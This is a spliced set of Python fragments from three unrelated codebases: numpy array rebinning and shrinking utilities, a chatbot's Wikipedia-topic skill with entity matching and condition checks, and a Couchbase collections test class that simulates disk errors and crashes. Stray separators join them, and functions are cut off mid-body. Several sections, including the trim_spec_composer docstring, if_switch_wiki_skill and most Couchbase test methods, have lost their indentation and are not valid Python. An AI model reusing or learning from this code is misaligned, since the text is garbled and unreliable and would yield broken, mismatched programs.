        # partially consumed `rebin_spec` iterator must be picklable for this
        # path to work -- verify both.
        recursion_res = Pool(processes=1).apply(
            rebin_nd, args=(a, rebin_spec, assume_sorted)
        )
    else:
        recursion_res = rebin_nd(a, rebin_spec, assume_sorted)
    res = rebin_1d(recursion_res, bins, new_bins, axis, grouped, assume_sorted)
    del recursion_res
    if a.size > external_process_threshold:
        # Eagerly collect garbage after large intermediate arrays are dropped.
        n = gc.collect()
        if n:
            del gc.garbage[:]
    return res
def rebin_spec_composer(bins_seq, new_bins_seq, axes=None, grouped_flags=None):
    """Zip bins/new_bins/axes/grouped sequences into rebin_nd spec tuples.

    See also :py:func:`mckit_meshes.utils.rebin.rebin_nd`.

    Args:
        bins_seq: sequence of ndarrays with the original bins.
        new_bins_seq: sequence of ndarrays with the new bins.
        axes: sequence of ints, optional; defaults to 0, 1, 2, ...
        grouped_flags: a single bool applied to every axis, a sequence of
            bools, or omitted (all axes treated as not grouped).

    Returns:
        Iterator over tuples (bins, new_bins, axis, grouped).
    """
    axes_iter = itertools.count() if not axes else axes
    if isinstance(grouped_flags, bool):
        flags_iter = itertools.repeat(grouped_flags)
    elif grouped_flags:
        flags_iter = grouped_flags
    else:
        flags_iter = itertools.repeat(False)
    return zip(bins_seq, new_bins_seq, axes_iter, flags_iter)
# @numba.jit
def shrink_1d(
    a: np.ndarray, bins: np.ndarray, low=None, high=None, axis=None, assume_sorted=False
) -> Tuple[np.ndarray, np.ndarray]:
    """Select sub-arrays of a `a` and corresponding `bins` for minimal span
    of bins, which completely covers the range [`low`..`high`]
    both sides included.
    Args:
        a: ndarray
            An array to shrink.
        bins: ndarray
            Bins corresponding to the grid `a` over the given `axis`.
        low: float, optional
            Left edge of the range to shrink to.
            When omitted, the `bins` left edge is used.
        high: float
            Right edge of the range to shrink to.
            When omitted, the `bins` right edge is used.
        axis: int, optional
            An axis of `a` over which to shrink. Default axis = 0.
        assume_sorted: bool, optional
            If True skip assertion of bins sorting order,
            by default False - asserts the input_file data
    Returns:
        new_bins: ndarray
            The shrank bins
        new_data: ndarray
            The shrank grid
    Raises:
        ValueError: when `low` or `high` falls outside the bins range, or the
            requested range produces an empty grid.
    """
    if low is None and high is None:
        return bins, a
    if axis is None:
        axis = 0
    assert a.shape[axis] == bins.size - 1
    assert assume_sorted or is_monotonically_increasing(bins)
    if low is None:
        low = bins[0]
    if high is None:
        high = bins[-1]
    if low == bins[0] and high == bins[-1]:
        return bins, a
    if low < bins[0] or bins[-1] < low:
        raise ValueError(
            "Low shrink edge is beyond the bins range: %g is not in [%g..%g]"
            % (low, bins[0], bins[-1])
        )
    if high < bins[0] or bins[-1] < high:
        # Bug fix: the reported range previously used bins[1] instead of
        # bins[0] for the lower edge.
        raise ValueError(
            "High shrink edge is beyond the bins range: %g is not in [%g..%g]"
            % (high, bins[0], bins[-1])
        )
    # Indices of the bins containing low/high; widen by one bin on each side
    # when an edge falls strictly inside a bin, so the span fully covers
    # [low..high].
    left_idx, right_idx = np.digitize([low, high], bins) - 1
    if left_idx > 0 and bins[left_idx] > low:
        left_idx -= 1
    if right_idx < bins.size - 1 and bins[right_idx] < high:
        right_idx += 1
    if right_idx - left_idx < 1:
        raise ValueError("Shrink results to empty grid")
    # Bug fix: the full-span shortcut compared right_idx to bins.size, which
    # is unreachable (right_idx <= bins.size - 1), so a full-span request
    # always produced a needless copy.
    if left_idx == 0 and right_idx == bins.size - 1:
        return bins, a
    indices = list(range(left_idx, right_idx + 1))
    new_bins = np.take(bins, indices)
    new_a = np.take(a, indices[:-1], axis=axis)
    return new_bins, new_a
def shrink_nd(a, trim_spec, assume_sorted=False):
    """Apply :func:`shrink_1d` recursively for every tuple in `trim_spec`.

    Args:
        a: the grid to shrink.
        trim_spec: iterable of tuples (bins, low, high, axis).
        assume_sorted: when True, skip the bins sorting-order assertion.

    Returns:
        A pair ``(new_bins_seq, shrunk_data)`` where ``new_bins_seq`` is a
        list of the shrunk bin arrays (``None`` when `trim_spec` is empty).
    """
    if not isinstance(trim_spec, collections.abc.Iterator):
        trim_spec = iter(trim_spec)
    try:
        bins, low, high, axis = next(trim_spec)
    except StopIteration:
        # Nothing left to trim: the data passes through unchanged.
        return None, a
    # Trim the remaining axes first, then this one on the recursed result.
    inner_bins, inner_data = shrink_nd(a, trim_spec, assume_sorted)
    shrunk_bins, shrunk_data = shrink_1d(
        inner_data, bins, low, high, axis, assume_sorted
    )
    result_bins = [shrunk_bins] + inner_bins if inner_bins else [shrunk_bins]
    return result_bins, shrunk_data
def trim_spec_composer(bins_seq, lefts=None, rights=None, axes=None):
"""
Helps to compose trim_spec parameter in
:py:func:`triniti_ne.rebin.trim_nd` with
reasonable defaults for lefts, rights and axes iterators.
Parameters
----------
| |
you want to learn about {} of {}?",
"Are you interested in {} of {}?",
"Do you want to hear about {} of {}?",
"Do you want to know about {} of {}?",
"Do you want me to tell you about {} of {}?",
"The next topic is {} of {}, continue?",
"Let me tell you about {} of {}, okey?",
]
# Topic-offer question templates with a single "{}" slot for the topic name.
QUESTION_TEMPLATES_SHORT = [
    "Would you like to know about {}?",
    "Do you want to learn about {}?",
    "Are you interested in {}?",
    "Do you want to hear about {}?",
    "Do you want to know about {}?",
    "Do you want me to tell you about {}?",
    "The next topic is {}, continue?",
    "Let me tell you about {}, okey?",
]
# Follow-up prompts asking whether to continue a news/fact narration.
NEWS_MORE = [
    "Do you want more details?",
    "Should I continue?",
    "What is your opinion?",
    "Do you want to hear more?",
    "I can tell you more, okay?",
    "Would you like to learn more?",
]
# Phrases produced by the dff wiki skill itself.
dff_wiki_phrases = ["Are you listening to music or playing games"]
# Confidence values keyed by the match kind labels returned by the
# find_entity_* helpers in this module.
CONF_DICT = {
    "UNDEFINED": 0.0,
    "USER_QUESTION_IN_BEGIN": 0.8,
    "ENTITY_IN_HISTORY": 0.9,
    "WIKI_TYPE_DOUBT": 0.9,
    "OTHER_DFF_SKILLS": 0.9,
    "WIKI_TYPE": 0.94,
    "IN_SCENARIO": 0.95,
    "SURE_WIKI_TYPE": 0.98,
    "WIKI_TOPIC": 0.99,
    "HIGH_CONF": 1.0,
}
# Filters out wiki markup/CSS fragments leaking into extracted text.
WIKI_BADLIST = re.compile(r"(margin|\bfont\b|wikimedia|wikitable| url )", re.IGNORECASE)
# Wikidata type ids per dff skill: when the previous bot turn came from one
# of these skills, entities of the listed types are preferred (see
# find_entity_wp).
transfer_from_skills = {
    "dff_animals_skill": {
        "Q16521",  # taxon
        "Q55983715",  # organisms known by a particular common name
        "Q38547",  # dog crossbreed
        "Q39367",  # dog breed
        "Q43577",  # cat breed
    },
    "dff_food_skill": {"Q28149961", "Q2095", "Q11004"},
    "dff_sport_skill": {
        "Q2066131",  # athlete
        "Q18536342",  # competitive player
        "Q20639856",  # team
        "Q847017",  # sports club
    },
    "dff_music_skill": {
        "Q488205",  # singer-songwriter
        "Q36834",  # composer
        "Q177220",  # singer
        "Q753110",  # songwriter
        "Q134556",  # single
        "Q7366",  # song
        "Q482994",  # album
    },
    "dff_movie_skill": {"Q11424", "Q24856", "Q10800557", "Q10798782", "Q2405480", "Q5398426", "Q15416", "Q2526255"},
    "dff_book_skill": {
        "Q36180",
        "Q49757",
        "Q214917",
        "Q6625963",
        "Q28389",
        "Q571",
        "Q277759",
        "Q8261",
        "Q47461344",
        "Q7725634",
        "Q1667921",
    },
}
def find_entity_wp(annotations, bot_uttr, specific_types=None):
    """Pick an entity from wiki_parser annotations suitable for the wiki skill.

    Scans entities reported by the wiki_parser annotator and keeps the first
    one whose Wikidata types intersect the allowed set (`specific_types` when
    given, otherwise the module-level `used_types`), grading the match with a
    confidence label from CONF_DICT.

    :param annotations: user utterance annotations dict (wiki_parser,
        cobot_entities, cobot_topics)
    :param bot_uttr: previous bot utterance dict
    :param specific_types: optional set of Wikidata type ids to restrict to
    :returns: (entity substring, entity id, matched types, conf label)
    """
    conf_type = "UNDEFINED"
    found_entity_substr = ""
    found_entity_id = ""
    found_entity_types = []
    nounphr_label_dict = {}
    nounphrases = annotations.get("cobot_entities", {}).get("labelled_entities", [])
    for nounphr in nounphrases:
        nounphr_text = nounphr.get("text", "")
        nounphr_label = nounphr.get("label", "")
        if nounphr_text and nounphr_label:
            nounphr_label_dict[nounphr_text] = nounphr_label
    bot_text = bot_uttr.get("text", "")
    bot_question = "?" in bot_text
    prev_active_skill = bot_uttr.get("active_skill", "")
    current_types = set()
    # If the previous bot turn was a question from one of the "transfer"
    # skills, only entities whose types match that skill's domain are
    # considered coherent with the dialogue.
    if bot_question and prev_active_skill and prev_active_skill in transfer_from_skills:
        current_types = transfer_from_skills[prev_active_skill]
    cobot_topics = annotations.get("cobot_topics", {}).get("text", [])
    wp_output = annotations.get("wiki_parser", {})
    if isinstance(wp_output, dict):
        all_entities_info = wp_output.get("entities_info", {})
        wiki_skill_entities_info = wp_output.get("wiki_skill_entities_info", {})
        topic_skill_entities_info = wp_output.get("topic_skill_entities_info", {})
        for entities_info in [all_entities_info, wiki_skill_entities_info, topic_skill_entities_info]:
            for entity, triplets in entities_info.items():
                entity_id = triplets.get("plain_entity", "")
                # Gather type ids from all typing relations reported by
                # wiki_parser.
                types = (
                    triplets.get("types", [])
                    + triplets.get("instance of", [])
                    + triplets.get("subclass of", [])
                    + triplets.get("occupation", [])
                    + triplets.get("types_2hop", [])
                )
                type_ids = [elem for elem, label in types]
                if specific_types:
                    inters = set(type_ids).intersection(specific_types)
                else:
                    inters = set(type_ids).intersection(used_types)
                coherent_with_prev = True
                if current_types and not set(type_ids).intersection(current_types):
                    coherent_with_prev = False
                in_not_used_types = set(type_ids).intersection(prohibited_types)
                in_not_used_topics = entity.lower() in prohibited_topics or entity.lower() in badlist_words
                token_conf = triplets["token_conf"]
                conf = triplets["conf"]
                found_animal = re.findall(ANIMALS_FIND_TEMPLATE, entity)
                # Animals and food topics are served by dedicated skills.
                in_banned_topics = found_animal or "Food_Drink" in cobot_topics
                if (
                    inters
                    and not in_not_used_topics
                    and not in_banned_topics
                    and nounphr_label_dict.get(entity, "") != "number"
                    and coherent_with_prev
                    and token_conf > 0.5
                    and conf > 0.2
                ):
                    # `pos` presumably is the entity position in the
                    # utterance; 0 means the leading mention -- TODO confirm.
                    pos = triplets.get("pos", 5)
                    found_entity_substr = entity
                    found_entity_id = entity_id
                    found_entity_types = inters
                    conf_type = "WIKI_TYPE"
                    if token_conf > 0.9 and conf > 0.8 and pos == 0:
                        conf_type = "SURE_WIKI_TYPE"
                    if pos > 0:
                        conf_type = "WIKI_TYPE_DOUBT"
                    if in_not_used_types:
                        conf_type = "OTHER_DFF_SKILLS"
                    break
            if found_entity_substr:
                break
    return found_entity_substr, found_entity_id, found_entity_types, conf_type
def find_entity_types(query_entity, annotations):
    """Collect Wikidata type ids for `query_entity` from wiki_parser output.

    Searches all three entity-info dicts produced by the wiki_parser
    annotator and returns the type ids gathered from the "types",
    "instance of", "subclass of", "occupation" and "types_2hop" relations of
    the first dict containing the entity.

    :param query_entity: entity substring to look up
    :param annotations: user utterance annotations dict
    :returns: set of Wikidata type ids (empty when the entity is not found)
    """
    wp_output = annotations.get("wiki_parser", {})
    if isinstance(wp_output, dict):
        # Bug fix: the original returned after scanning only "entities_info",
        # so entities present solely in the wiki/topic skill dicts always
        # yielded an empty set.
        for info_key in ["entities_info", "wiki_skill_entities_info",
                         "topic_skill_entities_info"]:
            triplets = wp_output.get(info_key, {}).get(query_entity)
            if triplets is not None:
                types = (
                    triplets.get("types", [])
                    + triplets.get("instance of", [])
                    + triplets.get("subclass of", [])
                    + triplets.get("occupation", [])
                    + triplets.get("types_2hop", [])
                )
                return set(elem for elem, label in types)
    return set()
def find_entity_by_types(annotations, types_to_find, relations=None):
    """Find the first confident wiki_parser entity having one of the given types.

    :param annotations: user utterance annotations dict
    :param types_to_find: Wikidata type ids to match against
    :param relations: optional relation names whose objects are collected
        for the matched entity
    :returns: (entity substring, matched type ids, {entity: {relation: objects}})
    """
    found_entity_wp = ""
    found_types = []
    found_entity_triplets = {}
    wp_output = annotations.get("wiki_parser", {})
    types_to_find = set(types_to_find)
    if isinstance(wp_output, dict):
        all_entities_info = wp_output.get("entities_info", {})
        wiki_skill_entities_info = wp_output.get("wiki_skill_entities_info", {})
        topic_skill_entities_info = wp_output.get("topic_skill_entities_info", {})
        for entities_info in [all_entities_info, wiki_skill_entities_info, topic_skill_entities_info]:
            for entity, triplets in entities_info.items():
                # NOTE(review): this uses the key "types_2_hop" while the
                # sibling helpers use "types_2hop" -- verify which spelling
                # the wiki_parser annotator actually emits.
                types = (
                    triplets.get("types", [])
                    + triplets.get("instance of", [])
                    + triplets.get("subclass of", [])
                    + triplets.get("types_2_hop", [])
                    + triplets.get("occupation", [])
                )
                type_ids = [elem for elem, label in types]
                logger.info(f"types_to_find {types_to_find} type_ids {type_ids}")
                inters = set(type_ids).intersection(types_to_find)
                conf = triplets["conf"]
                pos = triplets.get("pos", 5)
                # Accept only confident entities mentioned early in the
                # utterance.
                if inters and conf > 0.6 and pos < 2:
                    found_entity_wp = entity
                    found_types = list(inters)
                    entity_triplets = {}
                    if relations:
                        # Collect human-readable objects of the requested
                        # relations (obj[1] is the label part of the pair).
                        for relation in relations:
                            objects_info = triplets.get(relation, [])
                            if objects_info:
                                objects = [obj[1] for obj in objects_info]
                                entity_triplets[relation] = objects
                    if entity_triplets:
                        found_entity_triplets[entity] = entity_triplets
                    break
    return found_entity_wp, found_types, found_entity_triplets
def find_entity_nounphr(annotations):
    """Find a cobot noun phrase matching the wiki skill's known topics.

    First tries an exact match of the noun phrase against the module-level
    `used_substr` set, then a word-boundary substring match in either
    direction.

    :param annotations: user utterance annotations dict
    :returns: (matched topic substring or "", conf label from CONF_DICT keys)
    """
    found_entity_substr = ""
    conf_type = "UNDEFINED"
    nounphrases = annotations.get("cobot_entities", {}).get("labelled_entities", [])
    found = False
    for nounphr in nounphrases:
        nounphr_text = nounphr.get("text", "")
        nounphr_label = nounphr.get("label", "")
        in_not_used_substr = nounphr_text.lower() in prohibited_topics or nounphr_text.lower() in badlist_words
        if nounphr_text in used_substr and not in_not_used_substr and nounphr_label != "number":
            found_entity_substr = nounphr_text
            conf_type = "WIKI_TOPIC"
            # Animal topics are handled by the dedicated animals skill.
            found_animal = re.findall(ANIMALS_FIND_TEMPLATE, found_entity_substr)
            found = True
            if found_animal:
                conf_type = "OTHER_DFF_SKILLS"
            break
        if not found_entity_substr:
            # Fall back to a word-boundary substring match in either
            # direction.
            for used_entity_substr in used_substr:
                # NOTE(review): `and` binds tighter than `or` here, so the
                # first re.findall alternative bypasses the
                # `not in_not_used_substr` guard -- confirm whether the
                # badlist check was meant to apply to both alternatives.
                if (
                    re.findall(rf"\b{nounphr_text}\b", used_entity_substr, re.IGNORECASE)
                    or re.findall(rf"\b{used_entity_substr}\b", nounphr_text, re.IGNORECASE)
                    and not in_not_used_substr
                ):
                    found_entity_substr = used_entity_substr
                    conf_type = "WIKI_TOPIC"
                    found = True
                    break
        if found:
            break
    return found_entity_substr, conf_type
def check_nounphr(annotations, nounphr_to_find):
    """Return the first non-number cobot entity whose text is in `nounphr_to_find`.

    :param annotations: user utterance annotations dict
    :param nounphr_to_find: container of acceptable noun phrase texts
    :returns: the matching text, or "" when nothing matches
    """
    labelled = annotations.get("cobot_entities", {}).get("labelled_entities", [])
    for entity in labelled:
        text = entity.get("text", "")
        if text in nounphr_to_find and entity.get("label", "") != "number":
            return text
    return ""
def if_user_dont_know_topic(user_uttr, bot_uttr):
    """True when the bot asked what to talk about and the user had no preference.

    "No preference" covers "don't know" variants as well as "anything" /
    "everything" replies.
    """
    bot_asked_topic = re.findall(COMPILE_WHAT_TO_TALK_ABOUT, bot_uttr.get("text", ""))
    user_text = user_uttr["text"]
    no_preference = (
        re.findall("(do not|dont|don't) know", user_text)
        or re.findall("(anything|everything)", user_text)
    )
    return bool(bot_asked_topic and no_preference)
def check_condition_element(elem, user_uttr, bot_uttr, shared_memory={}):
    """Evaluate one condition element from the topic-config DSL.

    `elem` is a tuple whose first item selects the check kind ("is_yes",
    "is_no", "any", or a dict keyed by "pattern", "cobot_entities_type",
    "wiki_parser_types", "user_info" or "entity_triplets"); elem[1] selects
    the utterance side for pattern checks; an optional third falsy item
    negates the result.

    NOTE(review): the mutable default `shared_memory={}` is only read here,
    so it is benign, but it is a known Python pitfall -- consider `None`.

    :returns: True when the element's condition holds
    """
    flag = False
    annotations = user_uttr["annotations"]
    isyes = is_yes(user_uttr)
    isno = is_no(user_uttr)
    user_info = shared_memory.get("user_info", {})
    entity_triplets = shared_memory.get("entity_triplets", {})
    if elem[0] == "is_yes" and isyes:
        flag = True
    elif elem[0] == "is_no" and isno:
        flag = True
    elif "pattern" in elem[0]:
        # Patterns may be plain strings (matched case-insensitively) or
        # pre-compiled regexes (matched as compiled).
        pattern = elem[0]["pattern"]
        if elem[1] == "user" and (
            (isinstance(pattern, str) and re.findall(pattern, user_uttr["text"], re.IGNORECASE))
            or (isinstance(pattern, re.Pattern) and re.findall(pattern, user_uttr["text"]))
        ):
            flag = True
        if elem[1] == "bot" and (
            (isinstance(pattern, str) and re.findall(pattern, bot_uttr.get("text", ""), re.IGNORECASE))
            or (isinstance(pattern, re.Pattern) and re.findall(pattern, bot_uttr.get("text", "")))
        ):
            flag = True
    elif "cobot_entities_type" in elem[0]:
        # True when any labelled noun phrase has the requested label.
        cobot_entities_type = elem[0]["cobot_entities_type"]
        nounphrases = annotations.get("cobot_entities", {}).get("labelled_entities", [])
        for nounphr in nounphrases:
            nounphr_label = nounphr.get("label", "")
            if nounphr_label == cobot_entities_type:
                flag = True
    elif "wiki_parser_types" in elem[0]:
        # True when wiki_parser found an entity of one of the given types.
        wp_types = elem[0]["wiki_parser_types"]
        found_entity, *_ = find_entity_by_types(annotations, wp_types)
        if found_entity:
            flag = True
    elif "user_info" in elem[0]:
        # True when any requested key/value pair is present in shared memory.
        info_to_check = elem[0]["user_info"]
        for key, value in info_to_check.items():
            if key in user_info and user_info[key] == value:
                flag = True
                break
    elif "entity_triplets" in elem[0]:
        # Walk the stored triplets along the given key path (keys may be
        # indirected through user_info) and test intersection with the last
        # item, the expected object set.
        checked_entity_triplets = elem[0]["entity_triplets"]
        objects = set(checked_entity_triplets[-1])
        mem_objects = entity_triplets
        for key in checked_entity_triplets[:-1]:
            if key in user_info:
                key = user_info[key]
            mem_objects = mem_objects.get(key, {})
        if set(mem_objects).intersection(objects):
            flag = True
    elif elem[0] == "any":
        flag = True
    # A third, falsy tuple item negates the check.
    if len(elem) == 3 and not elem[2]:
        flag = not flag
    return flag
def check_condition(condition, user_uttr, bot_uttr, shared_memory):
    """Evaluate a condition spec: top-level elements are OR-ed together,
    while a list element is the AND of its sub-elements.
    """
    results = []
    for elem in condition:
        if isinstance(elem[0], (str, dict)):
            results.append(
                check_condition_element(elem, user_uttr, bot_uttr, shared_memory))
        elif isinstance(elem[0], list):
            results.append(all(
                check_condition_element(sub_elem, user_uttr, bot_uttr, shared_memory)
                for sub_elem in elem))
    return any(results)
def if_switch_test_skill(user_uttr, bot_uttr):
    """True when the user mentions art-related words (art, drawing, painting, photo)."""
    return bool(
        re.findall(r"(\bart\b|drawing|painting|photo)", user_uttr["text"], re.IGNORECASE)
    )
def if_switch_wiki_skill(user_uttr, bot_uttr):
flag = False
user_uttr_annotations = user_uttr["annotations"]
found_entity_substr, found_entity_id, found_entity_types, conf_type_wp = find_entity_wp(
user_uttr_annotations, bot_uttr
)
found_entity_substr, conf_type_nounphr = find_entity_nounphr(user_uttr_annotations)
user_dont_know = if_user_dont_know_topic(user_uttr, bot_uttr)
asked_name = "what is your name" in bot_uttr.get("text", "").lower()
asked_news = "news" in user_uttr["text"]
for topic, topic_info in topic_config.items():
pattern = topic_info.get("pattern", "")
if (
(isinstance(pattern, str) and re.findall(pattern, user_uttr["text"], re.IGNORECASE))
or (isinstance(pattern, re.Pattern) and re.findall(pattern, user_uttr["text"]))
or if_chat_about_particular_topic(user_uttr, bot_uttr, compiled_pattern=pattern)
):
flag = True
switch_on = topic_info.get("switch_on", [])
for switch_elem in switch_on:
condition = switch_elem["cond"]
checked_condition = check_condition(condition, user_uttr, bot_uttr, | |
from copy import deepcopy
from BucketLib.bucket import Bucket
from Cb_constants import DocLoading
from bucket_collections.collections_base import CollectionBase
from cb_tools.cbstats import Cbstats
from collections_helper.collections_spec_constants import MetaCrudParams
from couchbase_helper.documentgenerator import doc_generator
from couchbase_helper.durability_helper import DurabilityHelper
from error_simulation.cb_error import CouchbaseError
from error_simulation.disk_error import DiskError
from remote.remote_util import RemoteMachineShellConnection
class CollectionsSuccessTests(CollectionBase):
    def setUp(self):
        """Create the cluster/buckets via CollectionBase and cache the bucket under test."""
        super(CollectionsSuccessTests, self).setUp()
        # All tests in this class operate on the first (default) bucket.
        self.bucket = self.cluster.buckets[0]
    def tearDown(self):
        """Delegate all cleanup to CollectionBase."""
        super(CollectionsSuccessTests, self).tearDown()
    def __perform_collection_crud(self, mutation_num=1,
                                  verification_dict=None):
        """Create scopes/collections with docs and record the resulting stats.

        Adds 2 scopes (5 collections each) plus 10 collections to existing
        scopes per bucket, loading 100 docs into every new collection.

        :param mutation_num: mutation number tagged onto the loaded docs
        :param verification_dict: optional stat-verification dict updated
            in place with the effects of this CRUD task
        """
        collection_crud_spec = dict()
        collection_crud_spec["doc_crud"] = dict()
        collection_crud_spec[
            MetaCrudParams.SCOPES_TO_ADD_PER_BUCKET] = 2
        collection_crud_spec[
            MetaCrudParams.COLLECTIONS_TO_ADD_FOR_NEW_SCOPES] = 5
        collection_crud_spec[
            MetaCrudParams.COLLECTIONS_TO_ADD_PER_BUCKET] = 10
        collection_crud_spec["doc_crud"][
            MetaCrudParams.DocCrud.NUM_ITEMS_FOR_NEW_COLLECTIONS] = 100
        collection_crud_spec["doc_crud"][
            MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
        collection_crud_task = \
            self.bucket_util.run_scenario_from_spec(
                self.task,
                self.cluster,
                self.cluster.buckets,
                collection_crud_spec,
                mutation_num=mutation_num)
        if collection_crud_task.result is False:
            self.log_failure("Collection CRUD failed")
        if verification_dict is not None:
            self.update_verification_dict_from_collection_task(
                verification_dict,
                collection_crud_task)
    def test_basic_ops(self):
        """
        Basic tests for document CRUD operations using JSON docs
        """
        load_spec = dict()
        verification_dict = dict()
        # Stat validation reference variables
        verification_dict["ops_create"] = 0
        verification_dict["ops_update"] = 0
        verification_dict["ops_delete"] = 0
        verification_dict["rollback_item_count"] = 0
        verification_dict["sync_write_aborted_count"] = 0
        verification_dict["sync_write_committed_count"] = 0
        # Seed the expected counters from the docs setUp already loaded.
        for _, scope in self.bucket.scopes.items():
            for _, collection in scope.collections.items():
                verification_dict["ops_create"] += collection.num_items
                if self.durability_level in self.supported_d_levels:
                    verification_dict["sync_write_committed_count"] \
                        += collection.num_items
        # Baseline check before running any further mutations.
        failed = self.durability_helper.verify_vbucket_details_stats(
            self.bucket, self.cluster_util.get_kv_nodes(self.cluster),
            vbuckets=self.cluster.vbuckets,
            expected_val=verification_dict)
        if failed:
            self.fail("Cbstat vbucket-details verification failed")
        # load_spec["target_vbuckets"] = []
        load_spec["doc_crud"] = dict()
        load_spec["doc_crud"][
            MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 100
        load_spec["doc_crud"][
            MetaCrudParams.DocCrud.UPDATE_PERCENTAGE_PER_COLLECTION] = 25
        load_spec["doc_crud"][
            MetaCrudParams.DocCrud.DELETE_PERCENTAGE_PER_COLLECTION] = 25
        load_spec["doc_crud"][MetaCrudParams.DocCrud.COMMON_DOC_KEY] \
            = "test_collections"
        self.log.info("Perform 'create', 'update', 'delete' mutations")
        doc_loading_task = \
            self.bucket_util.run_scenario_from_spec(
                self.task,
                self.cluster,
                self.cluster.buckets,
                load_spec,
                mutation_num=2,
                async_load=True)
        # Perform new scope/collection creation during doc ops in parallel
        self.__perform_collection_crud(verification_dict=verification_dict)
        # Wait for doc_loading to complete
        self.task_manager.get_task_result(doc_loading_task)
        self.bucket_util.validate_doc_loading_results(doc_loading_task)
        if doc_loading_task.result is False:
            self.log_failure("Doc CRUDs failed")
        self.validate_test_failure()
        self.log.info("Validating doc_count in buckets")
        self.bucket_util._wait_for_stats_all_buckets(self.cluster,
                                                     self.cluster.buckets)
        self.bucket_util.validate_docs_per_collections_all_buckets(
            self.cluster)
        # Validate vbucket stats
        self.update_verification_dict_from_collection_task(verification_dict,
                                                           doc_loading_task)
        failed = self.durability_helper.verify_vbucket_details_stats(
            self.bucket, self.cluster_util.get_kv_nodes(self.cluster),
            vbuckets=self.cluster.vbuckets,
            expected_val=verification_dict)
        if failed:
            self.fail("Cbstat vbucket-details verification failed")
        self.validate_cruds_from_collection_mutation(doc_loading_task)
def test_with_persistence_issues(self):
"""
Test to make sure timeout is handled in durability calls
and document CRUDs are successful even with disk related failures
1. Select nodes from the cluster to simulate the specified error
2. Perform CRUD on the target bucket with given timeout
3. Using cbstats to verify the operation succeeds
4. Validate all mutations are succeeded
Note: self.sdk_timeout value is considered as 'seconds'
"""
if self.durability_level in [
Bucket.DurabilityLevel.MAJORITY_AND_PERSIST_TO_ACTIVE,
Bucket.DurabilityLevel.PERSIST_TO_MAJORITY]:
self.log.critical("Test not valid for persistence durability")
return
error_sim = dict()
shell_conn = dict()
cbstat_obj = dict()
failover_info = dict()
vb_info_info = dict()
active_vbs_in_target_nodes = list()
failover_info["init"] = dict()
failover_info["afterCrud"] = dict()
vb_info_info["init"] = dict()
vb_info_info["afterCrud"] = dict()
self.log.info("Selecting nodes to simulate error condition")
target_nodes = DurabilityHelper.getTargetNodes(self.cluster,
self.nodes_init,
self.num_nodes_affected)
self.log.info("Simulate error condition on %s" % target_nodes)
for node in target_nodes:
shell_conn[node.ip] = RemoteMachineShellConnection(node)
cbstat_obj[node.ip] = Cbstats(shell_conn[node.ip])
active_vbs_in_target_nodes += cbstat_obj[node.ip].vbucket_list(
self.bucket.name,
"active")
vb_info_info["init"][node.ip] = cbstat_obj[node.ip].vbucket_seqno(
self.bucket.name)
failover_info["init"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
if self.simulate_error \
in [DiskError.DISK_FULL, DiskError.DISK_FAILURE]:
error_sim = DiskError(self.log, self.task_manager,
self.cluster.master, target_nodes,
60, 0, False, 120,
disk_location="/data")
error_sim.create(action=self.simulate_error)
else:
for node in target_nodes:
# Create shell_connections
shell_conn[node.ip] = RemoteMachineShellConnection(node)
# Perform specified action
error_sim[node.ip] = CouchbaseError(self.log,
shell_conn[node.ip])
error_sim[node.ip].create(self.simulate_error,
bucket_name=self.bucket.name)
# Perform CRUDs with induced error scenario is active
load_spec = dict()
load_spec["doc_crud"] = dict()
load_spec["doc_crud"][
MetaCrudParams.DocCrud.CREATE_PERCENTAGE_PER_COLLECTION] = 100
load_spec["doc_crud"][
MetaCrudParams.DocCrud.UPDATE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.DELETE_PERCENTAGE_PER_COLLECTION] = 25
load_spec["doc_crud"][
MetaCrudParams.DocCrud.COMMON_DOC_KEY] = "test_collections"
self.log.info("Perform 'create', 'update', 'delete' mutations")
doc_loading_task = \
self.bucket_util.run_scenario_from_spec(
self.task,
self.cluster,
self.cluster.buckets,
load_spec,
mutation_num=1,
async_load=True)
# Perform new scope/collection creation during doc ops in parallel
self.__perform_collection_crud(mutation_num=2)
# Wait for doc_loading to complete and validate the doc ops
self.task_manager.get_task_result(doc_loading_task)
self.bucket_util.validate_doc_loading_results(doc_loading_task)
if doc_loading_task.result is False:
self.log_failure("Doc CRUDs failed with persistence issue")
if self.simulate_error \
in [DiskError.DISK_FULL, DiskError.DISK_FAILURE]:
error_sim.revert(self.simulate_error)
else:
# Revert the induced error condition
for node in target_nodes:
error_sim[node.ip].revert(self.simulate_error,
bucket_name=self.bucket.name)
# Disconnect the shell connection
shell_conn[node.ip].disconnect()
self.sleep(10, "Wait for node recovery to complete")
# Doc count validation
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.bucket_util.validate_docs_per_collections_all_buckets(
self.cluster)
# Fetch latest failover stats and validate the values are updated
self.log.info("Validating failover and seqno cbstats")
for node in target_nodes:
vb_info_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].vbucket_seqno(self.bucket.name)
failover_info["afterCrud"][node.ip] = \
cbstat_obj[node.ip].failover_stats(self.bucket.name)
# Failover validation
val = \
failover_info["init"][node.ip] \
== failover_info["afterCrud"][node.ip]
error_msg = "Failover stats got updated"
self.assertTrue(val, msg=error_msg)
# Seq_no validation (High level)
val = \
vb_info_info["init"][node.ip] \
!= vb_info_info["afterCrud"][node.ip]
self.assertTrue(val, msg="vbucket seq_no not updated after CRUDs")
self.validate_test_failure()
# Doc count validation
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.bucket_util.validate_docs_per_collections_all_buckets(
self.cluster)
def test_with_process_crash(self):
"""
Test to make sure durability will succeed even if a node goes down
due to crash and has enough nodes to satisfy the durability
1. Select a node from the cluster to simulate the specified error
2. Perform CRUD on the target bucket with given timeout
3. Using cbstats to verify the operation succeeds
4. Validate all mutations are succeeded
Note: self.sdk_timeout values is considered as 'seconds'
"""
if self.num_replicas < 2:
self.assertTrue(False, msg="Required: num_replicas > 1")
# Override num_of_nodes affected to 1 (Positive case)
self.num_nodes_affected = 1
error_sim = dict()
shell_conn = dict()
cbstat_obj = dict()
failover_info = dict()
vb_info_info = dict()
active_vbs_in_target_nodes = list()
failover_info["init"] = dict()
failover_info["afterCrud"] = dict()
vb_info_info["init"] = dict()
